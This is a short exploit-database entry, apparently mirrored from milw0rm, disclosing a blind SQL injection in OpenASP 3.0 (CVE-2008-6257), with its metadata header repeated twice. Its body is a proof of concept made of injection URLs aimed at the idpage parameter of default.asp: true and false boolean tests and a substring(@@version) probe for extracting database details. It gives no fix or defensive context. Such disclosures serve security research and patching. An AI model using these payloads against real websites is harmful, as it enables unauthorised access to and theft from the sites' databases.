OpenASP 3.0 - Blind SQL Injection
| EKU-ID: 15001 | CVE: OSVDB-49914;CVE-2008-6257 | OSVDB-ID: |
| Author: StAkeR | Published: 2008-11-17 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 15001 | CVE: OSVDB-49914;CVE-2008-6257 | OSVDB-ID: |
| Author: StAkeR | Published: 2008-11-17 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
/*
OpenASP <= 3.0 Blind SQL Injection Vulnerability
-----------------------------------------------------
by athos - staker[at]hotmail[dot]it
thanks XaDoS,anyway i've found another sql injection
http://openasp.it
-----------------------------------------------------
default.asp?modulo=pages&idpage=1 or 1=1 (true)
default.asp?modulo=pages&idpage=1 or 1=2 (false)
default.asp?modulo=pages&idpage=-1 and substring(@@version,1,1)=4/*
*/
# milw0rm.com [2008-11-17]